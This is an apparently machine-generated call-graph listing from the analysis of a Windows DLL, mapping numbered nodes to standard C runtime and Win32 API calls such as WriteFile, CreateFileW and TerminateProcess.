6310->6285 6310->6286 6342 222e6025 6311->6342 6314 222e4ae2 6317 222e4b39 _abort 8 API calls 6314->6317 6315 222e4ac2 GetPEB 6315->6314 6316 222e4ad2 GetCurrentProcess TerminateProcess 6315->6316 6316->6314 6318 222e4aea ExitProcess 6317->6318 6322 222e50e1 6319->6322 6321 222e5156 6321->6284 6323 222e50ed ___DestructExceptionObject 6322->6323 6330 222e5671 RtlEnterCriticalSection 6323->6330 6325 222e50fb 6331 222e515a 6325->6331 6329 222e5119 _abort 6329->6321 6330->6325 6334 222e5182 6331->6334 6335 222e517a 6331->6335 6332 222e2ada _ValidateLocalCookies 5 API calls 6333 222e5108 6332->6333 6337 222e5126 6333->6337 6334->6335 6336 222e571e _free 20 API calls 6334->6336 6335->6332 6336->6335 6340 222e56b9 RtlLeaveCriticalSection 6337->6340 6339 222e5130 6339->6329 6340->6339 6341->6310 6343 222e604a 6342->6343 6347 222e6040 6342->6347 6344 222e5c45 _abort 5 API calls 6343->6344 6344->6347 6345 222e2ada _ValidateLocalCookies 5 API calls 6346 222e4abe 6345->6346 6346->6314 6346->6315 6347->6345 7086 222e9db8 7088 222e9dbf 7086->7088 7087 222e9e20 7089 222eaa17 21 API calls 7087->7089 7090 222ea90e 7087->7090 7088->7087 7092 222e9ddf 7088->7092 7091 222e9e6e 7089->7091 7092->7090 7093 222eaa17 21 API calls 7092->7093 7094 222ea93e 7093->7094 7095 222e3eb3 7098 222e5411 7095->7098 7099 222e541d _abort 7098->7099 7100 222e5af6 _abort 38 API calls 7099->7100 7103 222e5422 7100->7103 7101 222e55a8 _abort 38 API calls 7102 222e544c 7101->7102 7103->7101 6348 222e5630 6350 222e563b 6348->6350 6351 222e5664 6350->6351 6352 222e5660 6350->6352 6354 222e5eb7 6350->6354 6361 222e5688 6351->6361 6355 222e5c45 _abort 5 API calls 6354->6355 6356 222e5ede 6355->6356 6357 222e5efc InitializeCriticalSectionAndSpinCount 6356->6357 6358 222e5ee7 6356->6358 6357->6358 6359 222e2ada _ValidateLocalCookies 5 API calls 6358->6359 6360 222e5f13 6359->6360 6360->6350 6362 222e56b4 6361->6362 6363 222e5695 6361->6363 6362->6352 6364 222e569f RtlDeleteCriticalSection 6363->6364 6364->6362 6364->6364 6475 222e3370 6486 222e3330 6475->6486 6487 222e334f 6486->6487 6488 222e3342 6486->6488 6489 222e2ada _ValidateLocalCookies 5 API calls 6488->6489 6489->6487 7307 222e63f0 7308 222e6400 7307->7308 7312 222e6416 7307->7312 7309 222e6368 __dosmaperr 20 API calls 7308->7309 7310 222e6405 7309->7310 7311 222e62ac _abort 26 API calls 7310->7311 7322 222e640f 7311->7322 7317 222e6561 7312->7317 7319 222e6480 7312->7319 7326 222e6580 7312->7326 7315 222e64ee 7316 222e571e _free 20 API calls 7315->7316 7316->7317 7352 222e679a 7317->7352 7318 222e64e5 7318->7315 7323 222e6573 7318->7323 7343 222e85eb 7318->7343 7337 222e4e76 7319->7337 7324 222e62bc _abort 11 API calls 7323->7324 7325 222e657f 7324->7325 7327 222e658c 7326->7327 7327->7327 7328 222e637b _abort 20 API calls 7327->7328 7329 222e65ba 7328->7329 7330 222e85eb 26 API calls 7329->7330 7331 222e65e6 7330->7331 7332 222e62bc _abort 11 API calls 7331->7332 7333 222e6615 ___scrt_fastfail 7332->7333 7334 222e66b6 FindFirstFileExA 7333->7334 7335 222e6705 7334->7335 7336 222e6580 26 API calls 7335->7336 7338 222e4e8b 7337->7338 7339 222e4e87 7337->7339 7338->7339 7340 222e637b _abort 20 API calls 7338->7340 7339->7318 7341 222e4eb9 7340->7341 7342 222e571e _free 20 API calls 7341->7342 7342->7339 7346 222e853a 7343->7346 7344 222e854f 7345 222e8554 7344->7345 7347 222e6368 __dosmaperr 20 API calls 7344->7347 7345->7318 7346->7344 7346->7345 7350 222e858b 7346->7350 7348 222e857a 7347->7348 7349 222e62ac _abort 26 API calls 7348->7349 7349->7345 7350->7345 7351 222e6368 __dosmaperr 20 API calls 7350->7351 7351->7348 7353 222e67a4 7352->7353 7354 222e67b4 7353->7354 7356 222e571e _free 20 API calls 7353->7356 7355 222e571e _free 20 API calls 7354->7355 7357 222e67bb 7355->7357 7356->7353 7357->7322 6490 222e9e71 6491 222e9e95 6490->6491 6492 222e9eae 6491->6492 6494 222eac6b __startOneArgErrorHandling 6491->6494 6493 222e9ef8 6492->6493 6498 222eaa53 6492->6498 6496 222eb2f0 21 API calls 6494->6496 6497 222eacad __startOneArgErrorHandling 6494->6497 6496->6497 6499 222eaa70 RtlDecodePointer 6498->6499 6501 222eaa80 6498->6501 6499->6501 6500 222e2ada _ValidateLocalCookies 5 API calls 6503 222eac67 6500->6503 6502 222eab0d 6501->6502 6504 222eab02 6501->6504 6506 222eaab7 6501->6506 6502->6504 6505 222e6368 __dosmaperr 20 API calls 6502->6505 6503->6493 6504->6500 6505->6504 6506->6504 6507 222e6368 __dosmaperr 20 API calls 6506->6507 6507->6504 6508 222e724e GetProcessHeap 6509 222e284f 6510 222e2882 std::exception::exception 27 API calls 6509->6510 6511 222e285d 6510->6511 6365 222e220c 6366 222e221a dllmain_dispatch 6365->6366 6367 222e2215 6365->6367 6369 222e22b1 6367->6369 6370 222e22c7 6369->6370 6372 222e22d0 6370->6372 6373 222e2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6370->6373 6372->6366 6373->6372 6512 222e5348 6513 222e3529 ___vcrt_uninitialize 8 API calls 6512->6513 6514 222e534f 6513->6514 6515 222e7b48 6525 222e8ebf 6515->6525 6519 222e7b55 6538 222e907c 6519->6538 6522 222e7b7f 6523 222e571e _free 20 API calls 6522->6523 6524 222e7b8a 6523->6524 6542 222e8ec8 6525->6542 6527 222e7b50 6528 222e8fdc 6527->6528 6529 222e8fe8 ___DestructExceptionObject 6528->6529 6562 222e5671 RtlEnterCriticalSection 6529->6562 6531 222e8ff3 6532 222e905e 6531->6532 6534 222e9032 RtlDeleteCriticalSection 6531->6534 6563 222ea09c 6531->6563 6576 222e9073 6532->6576 6536 222e571e _free 20 API calls 6534->6536 6536->6531 6537 222e906a _abort 6537->6519 6539 222e7b64 RtlDeleteCriticalSection 6538->6539 6540 222e9092 6538->6540 6539->6519 6539->6522 6540->6539 6541 222e571e _free 20 API calls 6540->6541 6541->6539 6543 222e8ed4 ___DestructExceptionObject 6542->6543 6552 222e5671 RtlEnterCriticalSection 6543->6552 6545 222e8f77 6557 222e8f97 6545->6557 6548 222e8ee3 6548->6545 6551 222e8e78 66 API calls 6548->6551 6553 222e7b94 RtlEnterCriticalSection 6548->6553 6554 222e8f6d 6548->6554 6549 222e8f83 _abort 6549->6527 6551->6548 6552->6548 6553->6548 6560 222e7ba8 RtlLeaveCriticalSection 6554->6560 6556 222e8f75 6556->6548 6561 222e56b9 RtlLeaveCriticalSection 6557->6561 6559 222e8f9e 6559->6549 6560->6556 6561->6559 6562->6531 6564 222ea0a8 ___DestructExceptionObject 6563->6564 6565 222ea0ce 6564->6565 6566 222ea0b9 6564->6566 6575 222ea0c9 _abort 6565->6575 6579 222e7b94 RtlEnterCriticalSection 6565->6579 6567 222e6368 __dosmaperr 20 API calls 6566->6567 6569 222ea0be 6567->6569 6571 222e62ac _abort 26 API calls 6569->6571 6570 222ea0ea 6580 222ea026 6570->6580 6571->6575 6573 222ea0f5 6596 222ea112 6573->6596 6575->6531 6860 222e56b9 RtlLeaveCriticalSection 6576->6860 6578 222e907a 6578->6537 6579->6570 6581 222ea048 6580->6581 6582 222ea033 6580->6582 6588 222ea043 6581->6588 6599 222e8e12 6581->6599 6583 222e6368 __dosmaperr 20 API calls 6582->6583 6584 222ea038 6583->6584 6586 222e62ac _abort 26 API calls 6584->6586 6586->6588 6588->6573 6589 222e907c 20 API calls 6590 222ea064 6589->6590 6605 222e7a5a 6590->6605 6592 222ea06a 6612 222eadce 6592->6612 6595 222e571e _free 20 API calls 6595->6588 6859 222e7ba8 RtlLeaveCriticalSection 6596->6859 6598 222ea11a 6598->6575 6600 222e8e2a 6599->6600 6602 222e8e26 6599->6602 6601 222e7a5a 26 API calls 6600->6601 6600->6602 6603 222e8e4a 6601->6603 6602->6589 6627 222e9a22 6603->6627 6606 222e7a7b 6605->6606 6607 222e7a66 6605->6607 6606->6592 6608 222e6368 __dosmaperr 20 API calls 6607->6608 6609 222e7a6b 6608->6609 6610 222e62ac _abort 26 API calls 6609->6610 6611 222e7a76 6610->6611 6611->6592 6613 222eaddd 6612->6613 6614 222eadf2 6612->6614 6615 222e6355 __dosmaperr 20 API calls 6613->6615 6616 222eae2d 6614->6616 6621 222eae19 6614->6621 6617 222eade2 6615->6617 6618 222e6355 __dosmaperr 20 API calls 6616->6618 6620 222e6368 __dosmaperr 20 API calls 6617->6620 6619 222eae32 6618->6619 6622 222e6368 __dosmaperr 20 API calls 6619->6622 6625 222ea070 6620->6625 6816 222eada6 6621->6816 6624 222eae3a 6622->6624 6626 222e62ac _abort 26 API calls 6624->6626 6625->6588 6625->6595 6626->6625 6628 222e9a2e ___DestructExceptionObject 6627->6628 6629 222e9a4e 6628->6629 6630 222e9a36 6628->6630 6632 222e9aec 6629->6632 6637 222e9a83 6629->6637 6652 222e6355 6630->6652 6634 222e6355 __dosmaperr 20 API calls 6632->6634 6636 222e9af1 6634->6636 6635 222e6368 __dosmaperr 20 API calls 6647 222e9a43 _abort 6635->6647 6638 222e6368 __dosmaperr 20 API calls 6636->6638 6655 222e8c7b RtlEnterCriticalSection 6637->6655 6640 222e9af9 6638->6640 6642 222e62ac _abort 26 API calls 6640->6642 6641 222e9a89 6643 222e9aba 6641->6643 6644 222e9aa5 6641->6644 6642->6647 6656 222e9b0d 6643->6656 6646 222e6368 __dosmaperr 20 API calls 6644->6646 6649 222e9aaa 6646->6649 6647->6602 6648 222e9ab5 6707 222e9ae4 6648->6707 6650 222e6355 __dosmaperr 20 API calls 6649->6650 6650->6648 6653 222e5b7a _abort 20 API calls 6652->6653 6654 222e635a 6653->6654 6654->6635 6655->6641 6657 222e9b3b 6656->6657 6695 222e9b34 6656->6695 6658 222e9b5e 6657->6658 6659 222e9b3f 6657->6659 6663 222e9baf 6658->6663 6664 222e9b92 6658->6664 6661 222e6355 __dosmaperr 20 API calls 6659->6661 6660 222e2ada _ValidateLocalCookies 5 API calls 6665 222e9d15 6660->6665 6662 222e9b44 6661->6662 6666 222e6368 __dosmaperr 20 API calls 6662->6666 6673 222e9bc5 6663->6673 6710 222ea00b 6663->6710 6667 222e6355 __dosmaperr 20 API calls 6664->6667 6665->6648 6668 222e9b4b 6666->6668 6671 222e9b97 6667->6671 6672 222e62ac _abort 26 API calls 6668->6672 6675 222e6368 __dosmaperr 20 API calls 6671->6675 6672->6695 6713 222e96b2 6673->6713 6678 222e9b9f 6675->6678 6676 222e9c0c 6679 222e9c66 WriteFile 6676->6679 6680 222e9c20 6676->6680 6677 222e9bd3 6681 222e9bf9 6677->6681 6682 222e9bd7 6677->6682 6683 222e62ac _abort 26 API calls 6678->6683 6687 222e9c89 GetLastError 6679->6687 6693 222e9bef 6679->6693 6684 222e9c28 6680->6684 6685 222e9c56 6680->6685 6725 222e9492 GetConsoleCP 6681->6725 6686 222e9ccd 6682->6686 6720 222e9645 6682->6720 6683->6695 6689 222e9c2d 6684->6689 6690 222e9c46 6684->6690 6751 222e9728 6685->6751 6694 222e6368 __dosmaperr 20 API calls 6686->6694 6686->6695 6687->6693 6689->6686 6736 222e9807 6689->6736 6743 222e98f5 6690->6743 6693->6686 6693->6695 6698 222e9ca9 6693->6698 6697 222e9cf2 6694->6697 6695->6660 6700 222e6355 __dosmaperr 20 API calls 6697->6700 6701 222e9cc4 6698->6701 6702 222e9cb0 6698->6702 6700->6695 6758 222e6332 6701->6758 6703 222e6368 __dosmaperr 20 API calls 6702->6703 6705 222e9cb5 6703->6705 6706 222e6355 __dosmaperr 20 API calls 6705->6706 6706->6695 6815 222e8c9e RtlLeaveCriticalSection 6707->6815 6709 222e9aea 6709->6647 6763 222e9f8d 6710->6763 6785 222e8dbc 6713->6785 6715 222e96c2 6716 222e96c7 6715->6716 6717 222e5af6 _abort 38 API calls 6715->6717 6716->6676 6716->6677 6718 222e96ea 6717->6718 6718->6716 6719 222e9708 GetConsoleMode 6718->6719 6719->6716 6722 222e969f 6720->6722 6724 222e966a 6720->6724 6721 222e96a1 GetLastError 6721->6722 6722->6693 6723 222ea181 WriteConsoleW CreateFileW 6723->6724 6724->6721 6724->6722 6724->6723 6727 222e94f5 6725->6727 6731 222e9607 6725->6731 6726 222e2ada _ValidateLocalCookies 5 API calls 6728 222e9641 6726->6728 6730 222e957b WideCharToMultiByte 6727->6730 6727->6731 6732 222e79e6 40 API calls __fassign 6727->6732 6735 222e95d2 WriteFile 6727->6735 6794 222e7c19 6727->6794 6728->6693 6730->6731 6733 222e95a1 WriteFile 6730->6733 6731->6726 6732->6727 6733->6727 6734 222e962a GetLastError 6733->6734 6734->6731 6735->6727 6735->6734 6737 222e9816 6736->6737 6738 222e98d8 6737->6738 6740 222e9894 WriteFile 6737->6740 6739 222e2ada _ValidateLocalCookies 5 API calls 6738->6739 6741 222e98f1 6739->6741 6740->6737 6742 222e98da GetLastError 6740->6742 6741->6693 6742->6738 6748 222e9904 6743->6748 6744 222e9a0f 6745 222e2ada _ValidateLocalCookies 5 API calls 6744->6745 6746 222e9a1e 6745->6746 6746->6693 6747 222e9986 WideCharToMultiByte 6749 222e99bb WriteFile 6747->6749 6750 222e9a07 GetLastError 6747->6750 6748->6744 6748->6747 6748->6749 6749->6748 6749->6750 6750->6744 6756 222e9737 6751->6756 6752 222e97ea 6753 222e2ada _ValidateLocalCookies 5 API calls 6752->6753 6757 222e9803 6753->6757 6754 222e97a9 WriteFile 6755 222e97ec GetLastError 6754->6755 6754->6756 6755->6752 6756->6752 6756->6754 6757->6693 6759 222e6355 __dosmaperr 20 API calls 6758->6759 6760 222e633d __dosmaperr 6759->6760 6761 222e6368 __dosmaperr 20 API calls 6760->6761 6762 222e6350 6761->6762 6762->6695 6772 222e8d52 6763->6772 6765 222e9f9f 6766 222e9fb8 SetFilePointerEx 6765->6766 6767 222e9fa7 6765->6767 6769 222e9fac 6766->6769 6770 222e9fd0 GetLastError 6766->6770 6768 222e6368 __dosmaperr 20 API calls 6767->6768 6768->6769 6769->6673 6771 222e6332 __dosmaperr 20 API calls 6770->6771 6771->6769 6773 222e8d5f 6772->6773 6774 222e8d74 6772->6774 6775 222e6355 __dosmaperr 20 API calls 6773->6775 6777 222e6355 __dosmaperr 20 API calls 6774->6777 6779 222e8d99 6774->6779 6776 222e8d64 6775->6776 6778 222e6368 __dosmaperr 20 API calls 6776->6778 6780 222e8da4 6777->6780 6781 222e8d6c 6778->6781 6779->6765 6782 222e6368 __dosmaperr 20 API calls 6780->6782 6781->6765 6783 222e8dac 6782->6783 6784 222e62ac _abort 26 API calls 6783->6784 6784->6781 6786 222e8dc9 6785->6786 6787 222e8dd6 6785->6787 6788 222e6368 __dosmaperr 20 API calls 6786->6788 6790 222e8de2 6787->6790 6791 222e6368 __dosmaperr 20 API calls 6787->6791 6789 222e8dce 6788->6789 6789->6715 6790->6715 6792 222e8e03 6791->6792 6793 222e62ac _abort 26 API calls 6792->6793 6793->6789 6795 222e5af6 _abort 38 API calls 6794->6795 6796 222e7c24 6795->6796 6799 222e7a00 6796->6799 6800 222e7a28 6799->6800 6801 222e7a13 6799->6801 6800->6727 6801->6800 6803 222e7f0f 6801->6803 6804 222e7f1b ___DestructExceptionObject 6803->6804 6805 222e5af6 _abort 38 API calls 6804->6805 6806 222e7f24 6805->6806 6807 222e5671 _abort RtlEnterCriticalSection 6806->6807 6809 222e7f72 _abort 6806->6809 6808 222e7f42 6807->6808 6810 222e7f86 __fassign 20 API calls 6808->6810 6809->6800 6811 222e7f56 6810->6811 6812 222e7f75 __fassign RtlLeaveCriticalSection 6811->6812 6813 222e7f69 6812->6813 6813->6809 6814 222e55a8 _abort 38 API calls 6813->6814 6814->6809 6815->6709 6819 222ead24 6816->6819 6818 222eadca 6818->6625 6820 222ead30 ___DestructExceptionObject 6819->6820 6830 222e8c7b RtlEnterCriticalSection 6820->6830 6822 222ead3e 6823 222ead65 6822->6823 6824 222ead70 6822->6824 6831 222eae4d 6823->6831 6826 222e6368 __dosmaperr 20 API calls 6824->6826 6827 222ead6b 6826->6827 6846 222ead9a 6827->6846 6829 222ead8d _abort 6829->6818 6830->6822 6832 222e8d52 26 API calls 6831->6832 6835 222eae5d 6832->6835 6833 222eae63 6849 222e8cc1 6833->6849 6835->6833 6837 222e8d52 26 API calls 6835->6837 6845 222eae95 6835->6845 6839 222eae8c 6837->6839 6838 222e8d52 26 API calls 6840 222eaea1 CloseHandle 6838->6840 6843 222e8d52 26 API calls 6839->6843 6840->6833 6844 222eaead GetLastError 6840->6844 6841 222e6332 __dosmaperr 20 API calls 6842 222eaedd 6841->6842 6842->6827 6843->6845 6844->6833 6845->6833 6845->6838 6858 222e8c9e RtlLeaveCriticalSection 6846->6858 6848 222eada4 6848->6829 6850 222e8d37 6849->6850 6852 222e8cd0 6849->6852 6851 222e6368 __dosmaperr 20 API calls 6850->6851 6853 222e8d3c 6851->6853 6852->6850 6857 222e8cfa 6852->6857 6854 222e6355 __dosmaperr 20 API calls 6853->6854 6855 222e8d27 6854->6855 6855->6841 6855->6842 6856 222e8d21 SetStdHandle 6856->6855 6857->6855 6857->6856 6858->6848 6859->6598 6860->6578 6861 222e2049 6862 222e2055 ___DestructExceptionObject 6861->6862 6863 222e207d 6862->6863 6864 222e20d3 6862->6864 6874 222e205e 6862->6874 6875 222e244c 6863->6875 6866 222e2639 ___scrt_fastfail 4 API calls 6864->6866 6868 222e20da 6866->6868 6867 222e2082 6884 222e2308 6867->6884 6870 222e2087 __RTC_Initialize 6887 222e20c4 6870->6887 6872 222e209f 6890 222e260b 6872->6890 6876 222e2451 ___scrt_release_startup_lock 6875->6876 6877 222e2455 6876->6877 6878 222e2461 6876->6878 6879 222e527a _abort 20 API calls 6877->6879 6881 222e246e 6878->6881 6882 222e499b _abort 28 API calls 6878->6882 6880 222e245f 6879->6880 6880->6867 6881->6867 6883 222e4bbd 6882->6883 6883->6867 6896 222e34c7 RtlInterlockedFlushSList 6884->6896 6886 222e2312 6886->6870 6898 222e246f 6887->6898 6889 222e20c9 ___scrt_release_startup_lock 6889->6872 6891 222e2617 6890->6891 6892 222e262d 6891->6892 6917 222e53ed 6891->6917 6892->6874 6895 222e3529 ___vcrt_uninitialize 8 API calls 6895->6892 6897 222e34d7 6896->6897 6897->6886 6903 222e53ff 6898->6903 6901 222e391b ___vcrt_uninitialize_ptd 6 API calls 6902 222e354d 6901->6902 6902->6889 6906 222e5c2b 6903->6906 6907 222e5c35 6906->6907 6909 222e2476 6906->6909 6910 222e5db2 6907->6910 6909->6901 6911 222e5c45 _abort 5 API calls 6910->6911 6912 222e5dd9 6911->6912 6913 222e5df1 TlsFree 6912->6913 6914 222e5de5 6912->6914 6913->6914 6915 222e2ada _ValidateLocalCookies 5 API calls 6914->6915 6916 222e5e02 6915->6916 6916->6909 6920 222e74da 6917->6920 6921 222e74f3 6920->6921 6922 222e2ada _ValidateLocalCookies 5 API calls 6921->6922 6923 222e2625 6922->6923 6923->6895 7112 222e8a89 7115 222e6d60 7112->7115 7116 222e6d72 7115->7116 7117 222e6d69 7115->7117 7119 222e6c5f 7117->7119 7120 222e5af6 _abort 38 API calls 7119->7120 7121 222e6c6c 7120->7121 7122 222e6d7e __fassign 38 API calls 7121->7122 7123 222e6c74 7122->7123 7139 222e69f3 7123->7139 7126 222e6c8b 7126->7116 7127 222e56d0 21 API calls 7128 222e6c9c 7127->7128 7129 222e6cce 7128->7129 7146 222e6e20 7128->7146 7132 222e571e _free 20 API calls 7129->7132 7132->7126 7133 222e6cc9 7134 222e6368 __dosmaperr 20 API calls 7133->7134 7134->7129 7135 222e6d12 7135->7129 7156 222e68c9 7135->7156 7136 222e6ce6 7136->7135 7137 222e571e _free 20 API calls 7136->7137 7137->7135 7140 222e54a7 __fassign 38 API calls 7139->7140 7141 222e6a05 7140->7141 7142 222e6a26 7141->7142 7143 222e6a14 GetOEMCP 7141->7143 7144 222e6a2b GetACP 7142->7144 7145 222e6a3d 7142->7145 7143->7145 7144->7145 7145->7126 7145->7127 7147 222e69f3 40 API calls 7146->7147 7148 222e6e3f 7147->7148 7151 222e6e90 IsValidCodePage 7148->7151 7153 222e6e46 7148->7153 7155 222e6eb5 ___scrt_fastfail 7148->7155 7149 222e2ada _ValidateLocalCookies 5 API calls 7150 222e6cc1 7149->7150 7150->7133 7150->7136 7152 222e6ea2 GetCPInfo 7151->7152 7151->7153 7152->7153 7152->7155 7153->7149 7159 222e6acb GetCPInfo 7155->7159 7232 222e6886 7156->7232 7158 222e68ed 7158->7129 7163 222e6b05 7159->7163 7168 222e6baf 7159->7168 7162 222e2ada _ValidateLocalCookies 5 API calls 7165 222e6c5b 7162->7165 7169 222e86e4 7163->7169 7165->7153 7167 222e8a3e 43 API calls 7167->7168 7168->7162 7170 222e54a7 __fassign 38 API calls 7169->7170 7171 222e8704 MultiByteToWideChar 7170->7171 7173 222e87da 7171->7173 7174 222e8742 7171->7174 7175 222e2ada _ValidateLocalCookies 5 API calls 7173->7175 7176 222e56d0 21 API calls 7174->7176 7179 222e8763 ___scrt_fastfail 7174->7179 7177 222e6b66 7175->7177 7176->7179 7183 222e8a3e 7177->7183 7178 222e87d4 7188 222e8801 7178->7188 7179->7178 7181 222e87a8 MultiByteToWideChar 7179->7181 7181->7178 7182 222e87c4 GetStringTypeW 7181->7182 7182->7178 7184 222e54a7 __fassign 38 API calls 7183->7184 7185 222e8a51 7184->7185 7192 222e8821 7185->7192 7189 222e881e 7188->7189 7190 222e880d 7188->7190 7189->7173 7190->7189 7191 222e571e _free 20 API calls 7190->7191 7191->7189 7193 222e883c 7192->7193 7194 222e8862 MultiByteToWideChar 7193->7194 7195 222e888c 7194->7195 7196 222e8a16 7194->7196 7200 222e56d0 21 API calls 7195->7200 7202 222e88ad 7195->7202 7197 222e2ada _ValidateLocalCookies 5 API calls 7196->7197 7198 222e6b87 7197->7198 7198->7167 7199 222e88f6 MultiByteToWideChar 7201 222e890f 7199->7201 7214 222e8962 7199->7214 7200->7202 7219 222e5f19 7201->7219 7202->7199 7202->7214 7204 222e8801 __freea 20 API calls 7204->7196 7206 222e8939 7209 222e5f19 11 API calls 7206->7209 7206->7214 7207 222e8971 7208 222e56d0 21 API calls 7207->7208 7212 222e8992 7207->7212 7208->7212 7209->7214 7210 222e8a07 7211 222e8801 __freea 20 API calls 7210->7211 7211->7214 7212->7210 7213 222e5f19 11 API calls 7212->7213 7215 222e89e6 7213->7215 7214->7204 7215->7210 7216 222e89f5 WideCharToMultiByte 7215->7216 7216->7210 7217 222e8a35 7216->7217 7218 222e8801 __freea 20 API calls 7217->7218 7218->7214 7220 222e5c45 _abort 5 API calls 7219->7220 7221 222e5f40 7220->7221 7222 222e5f49 7221->7222 7227 222e5fa1 7221->7227 7225 222e2ada _ValidateLocalCookies 5 API calls 7222->7225 7226 222e5f9b 7225->7226 7226->7206 7226->7207 7226->7214 7228 222e5c45 _abort 5 API calls 7227->7228 7229 222e5fc8 7228->7229 7230 222e2ada _ValidateLocalCookies 5 API calls 7229->7230 7231 222e5f89 LCMapStringW 7230->7231 7231->7222 7233 222e6892 ___DestructExceptionObject 7232->7233 7240 222e5671 RtlEnterCriticalSection 7233->7240 7235 222e689c 7241 222e68f1 7235->7241 7239 222e68b5 _abort 7239->7158 7240->7235 7253 222e7011 7241->7253 7243 222e693f 7244 222e7011 26 API calls 7243->7244 7245 222e695b 7244->7245 7246 222e7011 26 API calls 7245->7246 7247 222e6979 7246->7247 7248 222e571e _free 20 API calls 7247->7248 7249 222e68a9 7247->7249 7248->7249 7250 222e68bd 7249->7250 7267 222e56b9 RtlLeaveCriticalSection 7250->7267 7252 222e68c7 7252->7239 7254 222e7022 7253->7254 7263 222e701e 7253->7263 7255 222e703c ___scrt_fastfail 7254->7255 7256 222e7029 7254->7256 7260 222e706a 7255->7260 7261 222e7073 7255->7261 7255->7263 7257 222e6368 __dosmaperr 20 API calls 7256->7257 7258 222e702e 7257->7258 7259 222e62ac _abort 26 API calls 7258->7259 7259->7263 7262 222e6368 __dosmaperr 20 API calls 7260->7262 7261->7263 7265 222e6368 __dosmaperr 20 API calls 7261->7265 7264 222e706f 7262->7264 7263->7243 7266 222e62ac _abort 26 API calls 7264->7266 7265->7264 7266->7263 7267->7252 7358 222ea1c6 IsProcessorFeaturePresent 7359 222e7bc7 7360 222e7bd3 ___DestructExceptionObject 7359->7360 7362 222e7c0a _abort 7360->7362 7367 222e5671 RtlEnterCriticalSection 7360->7367 7363 222e7be7 7368 222e7f86 7363->7368 7367->7363 7369 222e7bf7 7368->7369 7370 222e7f94 __fassign 7368->7370 7372 222e7c10 7369->7372 7370->7369 7375 222e7cc2 7370->7375 7489 222e56b9 RtlLeaveCriticalSection 7372->7489 7374 222e7c17 7374->7362 7376 222e7d42 7375->7376 7379 222e7cd8 7375->7379 7378 222e571e _free 20 API calls 7376->7378 7402 222e7d90 7376->7402 7381 222e7d64 7378->7381 7379->7376 7380 222e7d0b 7379->7380 7383 222e571e _free 20 API calls 7379->7383 7389 222e571e _free 20 API calls 7380->7389 7401 222e7d2d 7380->7401 7382 222e571e _free 20 API calls 7381->7382 7384 222e7d77 7382->7384 7388 222e7d00 7383->7388 7390 222e571e _free 20 API calls 7384->7390 7385 222e571e _free 20 API calls 7391 222e7d37 7385->7391 7386 222e7dfe 7393 222e571e _free 20 API calls 7386->7393 7387 222e7d9e 7387->7386 7400 222e571e 20 API calls _free 7387->7400 7403 222e90ba 7388->7403 7395 222e7d22 7389->7395 7396 222e7d85 7390->7396 7392 222e571e _free 20 API calls 7391->7392 7392->7376 7397 222e7e04 7393->7397 7431 222e91b8 7395->7431 7399 222e571e _free 20 API calls 7396->7399 7397->7369 7399->7402 7400->7387 7401->7385 7443 222e7e35 7402->7443 7404 222e90cb 7403->7404 7405 222e91b4 7403->7405 7406 222e90dc 7404->7406 7407 222e571e _free 20 API calls 7404->7407 7405->7380 7408 222e90ee 7406->7408 7409 222e571e _free 20 API calls 7406->7409 7407->7406 7410 222e9100 7408->7410 7411 222e571e _free 20 API calls 7408->7411 7409->7408 7412 222e9112 7410->7412 7414 222e571e _free 20 API calls 7410->7414 7411->7410 7413 222e9124 7412->7413 7415 222e571e _free 20 API calls 7412->7415 7416 222e9136 7413->7416 7417 222e571e _free 20 API calls 7413->7417 7414->7412 7415->7413 7418 222e9148 7416->7418 7419 222e571e _free 20 API calls 7416->7419 7417->7416 7420 222e915a 7418->7420 7422 222e571e _free 20 API calls 7418->7422 7419->7418 7421 222e916c 7420->7421 7423 222e571e _free 20 API calls 7420->7423 7424 222e917e 7421->7424 7425 222e571e _free 20 API calls 7421->7425 7422->7420 7423->7421 7426 222e9190 7424->7426 7427 222e571e _free 20 API calls 7424->7427 7425->7424 7428 222e91a2 7426->7428 7429 222e571e _free 20 API calls 7426->7429 7427->7426 7428->7405 7430 222e571e _free 20 API calls 7428->7430 7429->7428 7430->7405 7432 222e921d 7431->7432 7433 222e91c5 7431->7433 7432->7401 7434 222e91d5 7433->7434 7435 222e571e _free 20 API calls 7433->7435 7436 222e91e7 7434->7436 7437 222e571e _free 20 API calls 7434->7437 7435->7434 7438 222e91f9 7436->7438 7439 222e571e _free 20 API calls 7436->7439 7437->7436 7440 222e920b 7438->7440 7441 222e571e _free 20 API calls 7438->7441 7439->7438 7440->7432 7442 222e571e _free 20 API calls 7440->7442 7441->7440 7442->7432 7444 222e7e42 7443->7444 7448 222e7e60 7443->7448 7444->7448 7449 222e925d 7444->7449 7447 222e571e _free 20 API calls 7447->7448 7448->7387 7450 222e7e5a 7449->7450 7451 222e926e 7449->7451 7450->7447 7485 222e9221 7451->7485 7454 222e9221 __fassign 20 API calls 7455 222e9281 7454->7455 7456 222e9221 __fassign 20 API calls 7455->7456 7457 222e928c 7456->7457 7458 222e9221 __fassign 20 API calls 7457->7458 7459 222e9297 7458->7459 7460 222e9221 __fassign 20 API calls 7459->7460 7461 222e92a5 7460->7461 7462 222e571e _free 20 API calls 7461->7462 7463 222e92b0 7462->7463 7464 222e571e _free 20 API calls 7463->7464 7465 222e92bb 7464->7465 7466 222e571e _free 20 API calls 7465->7466 7467 222e92c6 7466->7467 7468 222e9221 __fassign 20 API calls 7467->7468 7469 222e92d4 7468->7469 7470 222e9221 __fassign 20 API calls 7469->7470 7471 222e92e2 7470->7471 7472 222e9221 __fassign 20 API calls 7471->7472 7473 222e92f3 7472->7473 7474 222e9221 __fassign 20 API calls 7473->7474 7475 222e9301 7474->7475 7476 222e9221 __fassign 20 API calls 7475->7476 7477 222e930f 7476->7477 7478 222e571e _free 20 API calls 7477->7478 7479 222e931a 7478->7479 7480 222e571e _free 20 API calls 7479->7480 7481 222e9325 7480->7481 7482 222e571e _free 20 API calls 7481->7482 7483 222e9330 7482->7483 7484 222e571e _free 20 API calls 7483->7484 7484->7450 7486 222e9258 7485->7486 7487 222e9248 7485->7487 7486->7454 7487->7486 7488 222e571e _free 20 API calls 7487->7488 7488->7487 7489->7374 6924 222ea945 6925 222ea96d 6924->6925 6926 222ea9a5 6925->6926 6927 222ea99e 6925->6927 6928 222ea997 6925->6928 6937 222eaa00 6927->6937 6933 222eaa17 6928->6933 6934 222eaa20 6933->6934 6941 222eb19b 6934->6941 6938 222eaa20 6937->6938 6939 222eb19b __startOneArgErrorHandling 21 API calls 6938->6939 6940 222ea9a3 6939->6940 6942 222eb1da __startOneArgErrorHandling 6941->6942 6947 222eb25c 